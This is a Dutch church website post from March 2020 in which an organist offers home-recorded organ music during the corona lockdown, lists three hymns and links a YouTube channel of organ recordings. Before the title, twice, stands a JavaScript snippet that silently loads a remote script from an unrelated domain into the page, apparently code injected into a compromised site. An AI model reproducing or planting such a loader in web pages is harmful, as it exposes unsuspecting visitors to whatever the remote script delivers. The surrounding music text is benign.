;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Even een opkikker ! ... - PKN Damwâld

Even een opkikker ! …

Gepubliceerd op: vrijdag 27 maart 2020

Muziek verbindt. In een tijd waarin het corona-virus ons sociale leven beperkt, is misschien de behoefte aan muziek groter dan normaal. Want muziek biedt hoop, troost, stelt je gerust en geeft energie. Ik kwam op het idee om in deze tijd iets bijzonders te doen, voor iedereen die het kan gebruiken.

Voor mij is het orgel onlosmakelijk verbonden aan mijn eigen leven. Ik ben een enorme liefhebber van muziek in het algemeen en het orgel als instrument in het bijzonder. Het orgel is een veelzijdig instrument, je kan er veel kanten mee op. Van kerkelijke muziek tot modern, van klassiek tot pop, alles is mogelijk.

Ik heb thuis de beschikking over een bijzonder orgel, waarmee ik gespeelde muziek kan opnemen in een goede geluidskwaliteit.  De komende weken kunt via de website en de livestream muziek horen wat ik thuis heb opgenomen. Juist nu je even niet naar de kerk kan, wil je toch het gevoel hebben dat je erbij bent. Omdat de kerk en de muziek verbindt.

Heeft u een verzoeknummer welke uw graag zou willen horen, stuur gerust een bericht via het contact-formulier op de website of naar het mailadres redactie@pkndamwald.nl.

Onderstaand drie prachtige nummers om te beluisteren:

Ivo van Hijum

‘Vaste Rots van mijn behoud koraal vers 1 en 2’.

Eigen bewerking op ‘Welk een vriend is onze Jezus’

‘De Heer is mijn herder’

 

Nog een tip … klik op onderstaande link en u kunt genieten van een uur video opnamen vanuit de Martinikerk te Bolsward. Ontspannende orgelmuziek in spannende tijden.

Martin Mans en Hugo van der Meij op Hinsz pijporgel en Allen Portrait Kerkorgel. Veel luister en kijkplezier.

https://www.youtube.com/channel/UCUWKGB7YgRgj4M9OcaR-_dA